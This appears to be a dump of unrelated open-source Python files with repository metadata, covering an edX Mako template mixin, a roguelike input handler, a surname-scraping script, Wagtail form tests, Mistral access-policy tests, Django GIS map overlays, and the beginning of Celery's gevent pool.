wwj718/ANALYSE | common/lib/xmodule/xmodule/mako_module.py | 6 | 1459 | from .x_module import XModuleDescriptor, DescriptorSystem
class MakoDescriptorSystem(DescriptorSystem):
def __init__(self, render_template, **kwargs):
super(MakoDescriptorSystem, self).__init__(**kwargs)
self.render_template = render_template
class MakoModuleDescriptor(XModuleDescriptor):
"""
Module descriptor intended as a mixin that uses a mako template
to specify the module html.
Expects the descriptor to have the `mako_template` attribute set
with the name of the template to render, and it will pass
the descriptor as the `module` parameter to that template
MakoModuleDescriptor.__init__ takes the same arguments as xmodule.x_module:XModuleDescriptor.__init__
"""
def __init__(self, *args, **kwargs):
super(MakoModuleDescriptor, self).__init__(*args, **kwargs)
if getattr(self.runtime, 'render_template', None) is None:
raise TypeError('{runtime} must have a render_template function'
' in order to use a MakoDescriptor'.format(
runtime=self.runtime))
def get_context(self):
"""
Return the context to render the mako template with
"""
return {
'module': self,
'editable_metadata_fields': self.editable_metadata_fields
}
def get_html(self):
return self.system.render_template(
self.mako_template, self.get_context())
| agpl-3.0 | -8,738,385,567,089,706,000 | 34.585366 | 105 | 0.648389 | false |
nerdyLawman/pyhack | src/interface/controls.py | 1 | 4117 | import libtcodpy as libtcod
import gameconfig
def target_tile(max_range=None):
global key, mouse
# returns x, y of a tile selected by a mouseclick
while True:
libtcod.console_flush()
libtcod.sys_check_for_event(libtcod.EVENT_KEY_PRESS|libtcod.EVENT_MOUSE, key, mouse)
render_all()
(x, y) = (mouse.cx, mouse.cy)
if (mouse.lbutton_pressed and libtcod.map_is_in_fov(fov_map, x, y) and
(max_range is None or player.distance(x, y) <= max_range)):
return(x, y)
if mouse.rbutton_pressed or key.vk == libtcod.KEY_ESCAPE:
return(None, None)
def target_npc(max_range=None):
# select NPC in range
while True:
(x, y) = target_tile(max_range)
if x is None:
return None
for obj in objects:
if obj.x == x and obj.y == y and obj.fighter and obj != player:
return obj
def get_names_under_mouse():
# return name of object under mouse pointer
global mouse
(x, y) = (mouse.cx, mouse.cy)
names = [obj.name for obj in objects
if obj.x == x and obj.y == y and libtcod.map_is_in_fov(fov_map, obj.x, obj.y)]
names = ', '.join(names)
return names.capitalize()
def handle_keys():
global playerx, playery, fov_recompute, key
# primary game controls
if key.vk == libtcod.KEY_ENTER and key.lalt:
#Alt+Enter: toggle fullscreen
libtcod.console_set_fullscreen(not libtcod.console_is_fullscreen())
elif key.vk == libtcod.KEY_ESCAPE:
selected = 0
return('exit')
# 8-D movement arrorw keys or numpad
if key.vk == libtcod.KEY_UP or key.vk == libtcod.KEY_KP8:
player_move_or_attack(0, -1)
elif key.vk == libtcod.KEY_DOWN or key.vk == libtcod.KEY_KP2:
player_move_or_attack(0, 1)
elif key.vk == libtcod.KEY_LEFT or key.vk == libtcod.KEY_KP4:
player_move_or_attack(-1, 0)
elif key.vk == libtcod.KEY_RIGHT or key.vk == libtcod.KEY_KP6:
player_move_or_attack(1, 0)
elif key.vk == libtcod.KEY_KP7:
player_move_or_attack(-1, -1)
elif key.vk == libtcod.KEY_KP9:
player_move_or_attack(1, -1)
elif key.vk == libtcod.KEY_KP1:
player_move_or_attack(-1, 1)
elif key.vk == libtcod.KEY_KP3:
player_move_or_attack(1, 1)
elif key.vk == libtcod.KEY_KP5:
message('You wait a turn for the darkness to close in on you.', libtcod.white)
pass
else:
# additional game commands
key_char = chr(key.c)
# pick up an item
if key_char == 'g':
for obj in objects:
if obj.x == player.x and obj.y == player.y and obj.item:
obj.item.pick_up()
break
# go down stairs if player is on them
if key_char == ',' or key_char == '.':
if stairs.x == player.x and stairs.y == player.y:
next_level()
# display inventory
if key_char == 'i':
selection = -1
chosen_item = inventory_menu('Press the key next to an item to use it, or ESC to cancel\n')
if chosen_item is not None:
chosen_item.use()
# drop item
if key_char == 'd':
chosen_item = inventory_menu('Press the key next to an item to drop it.\n')
if chosen_item is not None:
chosen_item.drop()
# show character info
if key_char == 'c':
level_up_xp = LEVEL_UP_BASE + player.level * LEVEL_UP_FACTOR
message_box('Character Information\n\nLevel: ' + str(player.level) + '\nExperience: ' + str(player.fighter.xp) +
'\nExperience to level up: ' + str(level_up_xp) + '\n\nMaximum HP: ' + str(player.fighter.max_hp) +
'\nAttack: ' + str(player.fighter.power) + '\nDefense: ' + str(player.fighter.defense), 24)
# toggle fullscreen
if key_char == 'f':
libtcod.console_set_fullscreen(not libtcod.console_is_fullscreen())
return('no turn') # nothing valid happened
return('playing') # carry on
| gpl-3.0 | -7,436,060,564,142,350,000 | 37.476636 | 124 | 0.575419 | false |
subeax/grab | grab/tools/account/files/parse_ru_lname.py | 1 | 1893 | try:
from urllib import urlopen
except ImportError:
from urllib.request import urlopen
import re
urls = """
http://genofond.binec.ru/default2.aspx?p=98
http://genofond.binec.ru/default2.aspx?s=0&p=69
http://genofond.binec.ru/default2.aspx?s=0&p=70
http://genofond.binec.ru/default2.aspx?s=0&p=71
http://genofond.binec.ru/default2.aspx?s=0&p=72
http://genofond.binec.ru/default2.aspx?s=0&p=73
http://genofond.binec.ru/default2.aspx?s=0&p=74
http://genofond.binec.ru/default2.aspx?s=0&p=75
http://genofond.binec.ru/default2.aspx?s=0&p=76
http://genofond.binec.ru/default2.aspx?s=0&p=77
http://genofond.binec.ru/default2.aspx?s=0&p=78
http://genofond.binec.ru/default2.aspx?s=0&p=79
http://genofond.binec.ru/default2.aspx?s=0&p=80
http://genofond.binec.ru/default2.aspx?s=0&p=81
http://genofond.binec.ru/default2.aspx?s=0&p=82
http://genofond.binec.ru/default2.aspx?s=0&p=83
http://genofond.binec.ru/default2.aspx?s=0&p=84
http://genofond.binec.ru/default2.aspx?s=0&p=85
http://genofond.binec.ru/default2.aspx?s=0&p=88
http://genofond.binec.ru/default2.aspx?s=0&p=89
http://genofond.binec.ru/default2.aspx?s=0&p=90
http://genofond.binec.ru/default2.aspx?s=0&p=91
http://genofond.binec.ru/default2.aspx?s=0&p=92
http://genofond.binec.ru/default2.aspx?s=0&p=93
http://genofond.binec.ru/default2.aspx?s=0&p=94
http://genofond.binec.ru/default2.aspx?s=0&p=95
http://genofond.binec.ru/default2.aspx?s=0&p=96
http://genofond.binec.ru/default2.aspx?s=0&p=97
"""
urls = [x.strip() for x in urls.strip().splitlines()]
re_lname = re.compile(r'<FONT face=Calibri color=#000000 size=3>([^\d][^<]+)</FONT>')
outfile = file('ru_lname.txt', 'w')
for url in urls:
print(url)
data = urlopen(url).read().decode('cp1251')
items = []
for lname in re_lname.findall(data):
lname = lname.lower().capitalize()
outfile.write(lname.encode('utf-8') + '\n')
print(lname)
| mit | -4,212,795,307,099,121,700 | 36.117647 | 85 | 0.711569 | false |
tangentlabs/wagtail | wagtail/wagtailforms/tests.py | 14 | 17365 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.test import TestCase
from django.core import mail
from django import forms
from django.core.urlresolvers import reverse
from wagtail.wagtailcore.models import Page
from wagtail.wagtailforms.models import FormSubmission
from wagtail.wagtailforms.forms import FormBuilder
from wagtail.tests.testapp.models import FormPage, FormField
from wagtail.tests.utils import WagtailTestUtils
def make_form_page(**kwargs):
kwargs.setdefault('title', "Contact us")
kwargs.setdefault('slug', "contact-us")
kwargs.setdefault('to_address', "[email protected]")
kwargs.setdefault('from_address', "[email protected]")
kwargs.setdefault('subject', "The subject")
home_page = Page.objects.get(url_path='/home/')
form_page = home_page.add_child(instance=FormPage(**kwargs))
FormField.objects.create(
page=form_page,
sort_order=1,
label="Your email",
field_type='email',
required=True,
)
FormField.objects.create(
page=form_page,
sort_order=2,
label="Your message",
field_type='multiline',
required=True,
)
FormField.objects.create(
page=form_page,
sort_order=3,
label="Your choices",
field_type='checkboxes',
required=False,
choices='foo,bar,baz',
)
return form_page
class TestFormSubmission(TestCase):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
def test_get_form(self):
response = self.client.get('/contact-us/')
# Check response
self.assertContains(response, """<label for="id_your-email">Your email</label>""")
self.assertTemplateUsed(response, 'tests/form_page.html')
self.assertTemplateNotUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
def test_post_invalid_form(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob',
'your-message': 'hello world',
'your-choices': ''
})
# Check response
self.assertContains(response, "Enter a valid email address.")
self.assertTemplateUsed(response, 'tests/form_page.html')
self.assertTemplateNotUsed(response, 'tests/form_page_landing.html')
def test_post_valid_form(self):
response = self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
# Check that an email was sent
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, "The subject")
self.assertIn("Your message: hello world", mail.outbox[0].body)
self.assertEqual(mail.outbox[0].to, ['[email protected]'])
self.assertEqual(mail.outbox[0].from_email, '[email protected]')
# Check that form submission was saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
self.assertTrue(FormSubmission.objects.filter(page=form_page, form_data__contains='hello world').exists())
def test_post_unicode_characters(self):
self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'こんにちは、世界',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check the email
self.assertEqual(len(mail.outbox), 1)
self.assertIn("Your message: こんにちは、世界", mail.outbox[0].body)
# Check the form submission
submission = FormSubmission.objects.get()
submission_data = json.loads(submission.form_data)
self.assertEqual(submission_data['your-message'], 'こんにちは、世界')
def test_post_multiple_values(self):
response = self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'hello world',
'your-choices': {'foo': 'on', 'bar': 'on', 'baz': 'on'}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that the three checkbox values were saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
submission = FormSubmission.objects.filter(
page=form_page, form_data__contains='hello world'
)
self.assertIn("foo", submission[0].form_data)
self.assertIn("bar", submission[0].form_data)
self.assertIn("baz", submission[0].form_data)
def test_post_blank_checkbox(self):
response = self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'hello world',
'your-choices': {},
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that the checkbox was serialised in the email correctly
self.assertEqual(len(mail.outbox), 1)
self.assertIn("Your choices: None", mail.outbox[0].body)
class TestFormBuilder(TestCase):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
# Create a form builder
self.fb = FormBuilder(self.form_page.form_fields.all())
def test_fields(self):
"""
This tests that all fields were added to the form with the correct types
"""
form_class = self.fb.get_form_class()
self.assertIn('your-email', form_class.base_fields.keys())
self.assertIn('your-message', form_class.base_fields.keys())
self.assertIsInstance(form_class.base_fields['your-email'], forms.EmailField)
self.assertIsInstance(form_class.base_fields['your-message'], forms.CharField)
class TestFormsIndex(TestCase):
fixtures = ['test.json']
def setUp(self):
self.client.login(username='siteeditor', password='password')
self.form_page = Page.objects.get(url_path='/home/contact-us/')
def make_form_pages(self):
"""
This makes 100 form pages and adds them as children to 'contact-us'
This is used to test pagination on the forms index
"""
for i in range(100):
self.form_page.add_child(instance=FormPage(
title="Form " + str(i),
slug='form-' + str(i),
live=True
))
def test_forms_index(self):
response = self.client.get(reverse('wagtailforms:index'))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
def test_forms_index_pagination(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
response = self.client.get(reverse('wagtailforms:index'), {'p': 2})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that we got the correct page
self.assertEqual(response.context['form_pages'].number, 2)
def test_forms_index_pagination_invalid(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
response = self.client.get(reverse('wagtailforms:index'), {'p': 'Hello world!'})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that it got page one
self.assertEqual(response.context['form_pages'].number, 1)
def test_forms_index_pagination_out_of_range(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
response = self.client.get(reverse('wagtailforms:index'), {'p': 99999})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that it got the last page
self.assertEqual(response.context['form_pages'].number, response.context['form_pages'].paginator.num_pages)
def test_cannot_see_forms_without_permission(self):
# Login with as a user without permission to see forms
self.client.login(username='eventeditor', password='password')
response = self.client.get(reverse('wagtailforms:index'))
# Check that the user cannot see the form page
self.assertFalse(self.form_page in response.context['form_pages'])
def test_can_see_forms_with_permission(self):
response = self.client.get(reverse('wagtailforms:index'))
# Check that the user can see the form page
self.assertIn(self.form_page, response.context['form_pages'])
class TestFormsSubmissions(TestCase, WagtailTestUtils):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
# Add a couple of form submissions
old_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "[email protected]",
'your-message': "this is a really old message",
}),
)
old_form_submission.submit_time = '2013-01-01T12:00:00.000Z'
old_form_submission.save()
new_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "[email protected]",
'your-message': "this is a fairly new message",
}),
)
new_form_submission.submit_time = '2014-01-01T12:00:00.000Z'
new_form_submission.save()
# Login
self.login()
def make_list_submissions(self):
"""
This makes 100 submissions to test pagination on the forms submissions page
"""
for i in range(100):
submission = FormSubmission(
page=self.form_page,
form_data=json.dumps({
'hello': 'world'
})
)
submission.save()
def test_list_submissions(self):
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 2)
def test_list_submissions_filtering(self):
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_from': '01/01/2014'})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 1)
def test_list_submissions_pagination(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 2})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got the correct page
self.assertEqual(response.context['submissions'].number, 2)
def test_list_submissions_pagination_invalid(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 'Hello World!'})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got page one
self.assertEqual(response.context['submissions'].number, 1)
def test_list_submissions_pagination_out_of_range(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 99999})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got the last page
self.assertEqual(response.context['submissions'].number, response.context['submissions'].paginator.num_pages)
def test_list_submissions_csv_export(self):
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_from': '01/01/2014', 'action': 'CSV'})
# Check response
self.assertEqual(response.status_code, 200)
data_line = response.content.decode().split("\n")[1]
self.assertIn('[email protected]', data_line)
def test_list_submissions_csv_export_with_unicode(self):
unicode_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "[email protected]",
'your-message': 'こんにちは、世界',
}),
)
unicode_form_submission.submit_time = '2014-01-02T12:00:00.000Z'
unicode_form_submission.save()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_from': '01/02/2014', 'action': 'CSV'})
# Check response
self.assertEqual(response.status_code, 200)
data_line = response.content.decode('utf-8').split("\n")[1]
self.assertIn('こんにちは、世界', data_line)
class TestDeleteFormSubmission(TestCase):
fixtures = ['test.json']
def setUp(self):
self.client.login(username='siteeditor', password='password')
self.form_page = Page.objects.get(url_path='/home/contact-us/')
def test_delete_submission_show_cofirmation(self):
response = self.client.get(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
# Check show confirm page when HTTP method is GET
self.assertTemplateUsed(response, 'wagtailforms/confirm_delete.html')
# Check that the deletion has not happened with GET request
self.assertEqual(FormSubmission.objects.count(), 2)
def test_delete_submission_with_permissions(self):
response = self.client.post(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
# Check that the submission is gone
self.assertEqual(FormSubmission.objects.count(), 1)
# Should be redirected to list of submissions
self.assertRedirects(response, reverse("wagtailforms:list_submissions", args=(self.form_page.id, )))
def test_delete_submission_bad_permissions(self):
self.form_page = make_form_page()
self.client.login(username="eventeditor", password="password")
response = self.client.post(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
# Check that the user recieved a 403 response
self.assertEqual(response.status_code, 403)
# Check that the deletion has not happened
self.assertEqual(FormSubmission.objects.count(), 2)
class TestIssue798(TestCase):
fixtures = ['test.json']
def setUp(self):
self.client.login(username='siteeditor', password='password')
self.form_page = Page.objects.get(url_path='/home/contact-us/').specific
# Add a number field to the page
FormField.objects.create(
page=self.form_page,
label="Your favourite number",
field_type='number',
)
def test_post(self):
response = self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''},
'your-favourite-number': '7.3',
})
# Check response
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that form submission was saved correctly
self.assertTrue(FormSubmission.objects.filter(page=self.form_page, form_data__contains='7.3').exists())
| bsd-3-clause | -6,948,488,577,452,455,000 | 36.740175 | 150 | 0.631819 | false |
StackStorm/mistral | mistral/tests/unit/api/test_access_control.py | 1 | 2229 | # Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mistral.api import access_control as acl
from mistral import exceptions as exc
from mistral.tests.unit import base
from mistral.tests.unit.mstrlfixtures import policy_fixtures
class PolicyTestCase(base.BaseTest):
"""Tests whether the configuration of the policy engine is correct."""
def setUp(self):
super(PolicyTestCase, self).setUp()
self.policy = self.useFixture(policy_fixtures.PolicyFixture())
rules = {
"example:admin": "rule:admin_only",
"example:admin_or_owner": "rule:admin_or_owner"
}
self.policy.register_rules(rules)
def test_admin_api_allowed(self):
auth_ctx = base.get_context(default=True, admin=True)
self.assertTrue(
acl.enforce('example:admin', auth_ctx, auth_ctx.to_dict())
)
def test_admin_api_disallowed(self):
auth_ctx = base.get_context(default=True)
self.assertRaises(
exc.NotAllowedException,
acl.enforce,
'example:admin',
auth_ctx,
auth_ctx.to_dict()
)
def test_admin_or_owner_api_allowed(self):
auth_ctx = base.get_context(default=True)
self.assertTrue(
acl.enforce('example:admin_or_owner', auth_ctx, auth_ctx.to_dict())
)
def test_admin_or_owner_api_disallowed(self):
auth_ctx = base.get_context(default=True)
target = {'project_id': 'another'}
self.assertRaises(
exc.NotAllowedException,
acl.enforce,
'example:admin_or_owner',
auth_ctx,
target
)
| apache-2.0 | -7,675,515,347,808,505,000 | 30.842857 | 79 | 0.647824 | false |
beni55/django | django/contrib/gis/maps/google/overlays.py | 13 | 11940 | from __future__ import unicode_literals
from django.contrib.gis.geos import (
LinearRing, LineString, Point, Polygon, fromstr,
)
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import total_ordering
from django.utils.safestring import mark_safe
@python_2_unicode_compatible
class GEvent(object):
"""
A Python wrapper for the Google GEvent object.
Events can be attached to any object derived from GOverlayBase with the
add_event() call.
For more information please see the Google Maps API Reference:
http://code.google.com/apis/maps/documentation/reference.html#GEvent
Example:
from django.shortcuts import render_to_response
from django.contrib.gis.maps.google import GoogleMap, GEvent, GPolyline
def sample_request(request):
polyline = GPolyline('LINESTRING(101 26, 112 26, 102 31)')
event = GEvent('click',
'function() { location.href = "http://www.google.com"}')
polyline.add_event(event)
return render_to_response('mytemplate.html',
{'google' : GoogleMap(polylines=[polyline])})
"""
def __init__(self, event, action):
"""
Initializes a GEvent object.
Parameters:
event:
string for the event, such as 'click'. The event must be a valid
event for the object in the Google Maps API.
There is no validation of the event type within Django.
action:
string containing a Javascript function, such as
'function() { location.href = "newurl";}'
The string must be a valid Javascript function. Again there is no
validation fo the function within Django.
"""
self.event = event
self.action = action
def __str__(self):
"Returns the parameter part of a GEvent."
return mark_safe('"%s", %s' % (self.event, self.action))
@python_2_unicode_compatible
class GOverlayBase(object):
def __init__(self):
self.events = []
def latlng_from_coords(self, coords):
"Generates a JavaScript array of GLatLng objects for the given coordinates."
return '[%s]' % ','.join('new GLatLng(%s,%s)' % (y, x) for x, y in coords)
def add_event(self, event):
"Attaches a GEvent to the overlay object."
self.events.append(event)
def __str__(self):
"The string representation is the JavaScript API call."
return mark_safe('%s(%s)' % (self.__class__.__name__, self.js_params))
class GPolygon(GOverlayBase):
"""
A Python wrapper for the Google GPolygon object. For more information
please see the Google Maps API Reference:
http://code.google.com/apis/maps/documentation/reference.html#GPolygon
"""
def __init__(self, poly,
stroke_color='#0000ff', stroke_weight=2, stroke_opacity=1,
fill_color='#0000ff', fill_opacity=0.4):
"""
The GPolygon object initializes on a GEOS Polygon or a parameter that
may be instantiated into GEOS Polygon. Please note that this will not
depict a Polygon's internal rings.
Keyword Options:
stroke_color:
The color of the polygon outline. Defaults to '#0000ff' (blue).
stroke_weight:
The width of the polygon outline, in pixels. Defaults to 2.
stroke_opacity:
The opacity of the polygon outline, between 0 and 1. Defaults to 1.
fill_color:
The color of the polygon fill. Defaults to '#0000ff' (blue).
fill_opacity:
The opacity of the polygon fill. Defaults to 0.4.
"""
if isinstance(poly, six.string_types):
poly = fromstr(poly)
if isinstance(poly, (tuple, list)):
poly = Polygon(poly)
if not isinstance(poly, Polygon):
raise TypeError('GPolygon may only initialize on GEOS Polygons.')
# Getting the envelope of the input polygon (used for automatically
# determining the zoom level).
self.envelope = poly.envelope
# Translating the coordinates into a JavaScript array of
# Google `GLatLng` objects.
self.points = self.latlng_from_coords(poly.shell.coords)
# Stroke settings.
self.stroke_color, self.stroke_opacity, self.stroke_weight = stroke_color, stroke_opacity, stroke_weight
# Fill settings.
self.fill_color, self.fill_opacity = fill_color, fill_opacity
super(GPolygon, self).__init__()
@property
def js_params(self):
return '%s, "%s", %s, %s, "%s", %s' % (self.points, self.stroke_color, self.stroke_weight, self.stroke_opacity,
self.fill_color, self.fill_opacity)
class GPolyline(GOverlayBase):
"""
A Python wrapper for the Google GPolyline object. For more information
please see the Google Maps API Reference:
http://code.google.com/apis/maps/documentation/reference.html#GPolyline
"""
def __init__(self, geom, color='#0000ff', weight=2, opacity=1):
"""
The GPolyline object may be initialized on GEOS LineStirng, LinearRing,
and Polygon objects (internal rings not supported) or a parameter that
may instantiated into one of the above geometries.
Keyword Options:
color:
The color to use for the polyline. Defaults to '#0000ff' (blue).
weight:
The width of the polyline, in pixels. Defaults to 2.
opacity:
The opacity of the polyline, between 0 and 1. Defaults to 1.
"""
# If a GEOS geometry isn't passed in, try to construct one.
if isinstance(geom, six.string_types):
geom = fromstr(geom)
if isinstance(geom, (tuple, list)):
geom = Polygon(geom)
# Generating the lat/lng coordinate pairs.
if isinstance(geom, (LineString, LinearRing)):
self.latlngs = self.latlng_from_coords(geom.coords)
elif isinstance(geom, Polygon):
self.latlngs = self.latlng_from_coords(geom.shell.coords)
else:
raise TypeError('GPolyline may only initialize on GEOS LineString, LinearRing, and/or Polygon geometries.')
# Getting the envelope for automatic zoom determination.
self.envelope = geom.envelope
self.color, self.weight, self.opacity = color, weight, opacity
super(GPolyline, self).__init__()
@property
def js_params(self):
return '%s, "%s", %s, %s' % (self.latlngs, self.color, self.weight, self.opacity)
@total_ordering
class GIcon(object):
"""
Creates a GIcon object to pass into a Gmarker object.
The keyword arguments map to instance attributes of the same name. These,
in turn, correspond to a subset of the attributes of the official GIcon
javascript object:
http://code.google.com/apis/maps/documentation/reference.html#GIcon
Because a Google map often uses several different icons, a name field has
been added to the required arguments.
Required Arguments:
varname:
A string which will become the basis for the js variable name of
the marker, for this reason, your code should assign a unique
name for each GIcon you instantiate, otherwise there will be
name space collisions in your javascript.
Keyword Options:
image:
The url of the image to be used as the icon on the map defaults
to 'G_DEFAULT_ICON'
iconsize:
a tuple representing the pixel size of the foreground (not the
shadow) image of the icon, in the format: (width, height) ex.:
GIcon('fast_food',
image="/media/icon/star.png",
iconsize=(15,10))
Would indicate your custom icon was 15px wide and 10px height.
shadow:
the url of the image of the icon's shadow
shadowsize:
a tuple representing the pixel size of the shadow image, format is
the same as ``iconsize``
iconanchor:
a tuple representing the pixel coordinate relative to the top left
corner of the icon image at which this icon is anchored to the map.
In (x, y) format. x increases to the right in the Google Maps
coordinate system and y increases downwards in the Google Maps
coordinate system.)
infowindowanchor:
The pixel coordinate relative to the top left corner of the icon
image at which the info window is anchored to this icon.
"""
def __init__(self, varname, image=None, iconsize=None,
shadow=None, shadowsize=None, iconanchor=None,
infowindowanchor=None):
self.varname = varname
self.image = image
self.iconsize = iconsize
self.shadow = shadow
self.shadowsize = shadowsize
self.iconanchor = iconanchor
self.infowindowanchor = infowindowanchor
def __eq__(self, other):
return self.varname == other.varname
def __lt__(self, other):
return self.varname < other.varname
def __hash__(self):
# XOR with hash of GIcon type so that hash('varname') won't
# equal hash(GIcon('varname')).
return hash(self.__class__) ^ hash(self.varname)
class GMarker(GOverlayBase):
"""
A Python wrapper for the Google GMarker object. For more information
please see the Google Maps API Reference:
http://code.google.com/apis/maps/documentation/reference.html#GMarker
Example:
from django.shortcuts import render_to_response
from django.contrib.gis.maps.google.overlays import GMarker, GEvent
def sample_request(request):
marker = GMarker('POINT(101 26)')
event = GEvent('click',
'function() { location.href = "http://www.google.com"}')
marker.add_event(event)
return render_to_response('mytemplate.html',
{'google' : GoogleMap(markers=[marker])})
"""
def __init__(self, geom, title=None, draggable=False, icon=None):
"""
The GMarker object may initialize on GEOS Points or a parameter
that may be instantiated into a GEOS point. Keyword options map to
GMarkerOptions -- so far only the title option is supported.
Keyword Options:
title:
Title option for GMarker, will be displayed as a tooltip.
draggable:
Draggable option for GMarker, disabled by default.
"""
# If a GEOS geometry isn't passed in, try to construct one.
if isinstance(geom, six.string_types):
geom = fromstr(geom)
if isinstance(geom, (tuple, list)):
geom = Point(geom)
if isinstance(geom, Point):
self.latlng = self.latlng_from_coords(geom.coords)
else:
raise TypeError('GMarker may only initialize on GEOS Point geometry.')
# Getting the envelope for automatic zoom determination.
self.envelope = geom.envelope
# TODO: Add support for more GMarkerOptions
self.title = title
self.draggable = draggable
self.icon = icon
super(GMarker, self).__init__()
def latlng_from_coords(self, coords):
return 'new GLatLng(%s,%s)' % (coords[1], coords[0])
def options(self):
result = []
if self.title:
result.append('title: "%s"' % self.title)
if self.icon:
result.append('icon: %s' % self.icon.varname)
if self.draggable:
result.append('draggable: true')
return '{%s}' % ','.join(result)
@property
def js_params(self):
return '%s, %s' % (self.latlng, self.options())
| bsd-3-clause | 5,867,305,581,385,733,000 | 35.402439 | 119 | 0.622027 | false |
liberorbis/libernext | env/lib/python2.7/site-packages/celery/concurrency/gevent.py | 8 | 3510 | # -*- coding: utf-8 -*-
"""
celery.concurrency.gevent
~~~~~~~~~~~~~~~~~~~~~~~~~
gevent pool implementation.
"""
from __future__ import absolute_import
from time import time
try:
from gevent import Timeout
except ImportError: # pragma: no cover
Timeout = None # noqa
from celery.utils import timer2
from .base import apply_target, BasePool
__all__ = ['TaskPool']
def apply_timeout(target, args=(), kwargs={}, callback=None,
accept_callback=None, pid=None, timeout=None,
timeout_callback=None, Timeout=Timeout,
apply_target=apply_target, **rest):
try:
with Timeout(timeout):
return apply_target(target, args, kwargs, callback,
accept_callback, pid,
propagate=(Timeout, ), **rest)
except Timeout:
return timeout_callback(False, timeout)
class Schedule(timer2.Schedule):
def __init__(self, *args, **kwargs):
from gevent.greenlet import Greenlet, GreenletExit
class _Greenlet(Greenlet):
cancel = Greenlet.kill
self._Greenlet = _Greenlet
self._GreenletExit = GreenletExit
super(Schedule, self).__init__(*args, **kwargs)
self._queue = set()
def _enter(self, eta, priority, entry):
secs = max(eta - time(), 0)
g = self._Greenlet.spawn_later(secs, entry)
self._queue.add(g)
g.link(self._entry_exit)
g.entry = entry
g.eta = eta
g.priority = priority
g.cancelled = False
return g
def _entry_exit(self, g):
try:
g.kill()
finally:
self._queue.discard(g)
def clear(self):
queue = self._queue
while queue:
try:
queue.pop().kill()
except KeyError:
pass
@property
def queue(self):
return self._queue
class Timer(timer2.Timer):
Schedule = Schedule
def ensure_started(self):
pass
def stop(self):
self.schedule.clear()
def start(self):
pass
class TaskPool(BasePool):
Timer = Timer
signal_safe = False
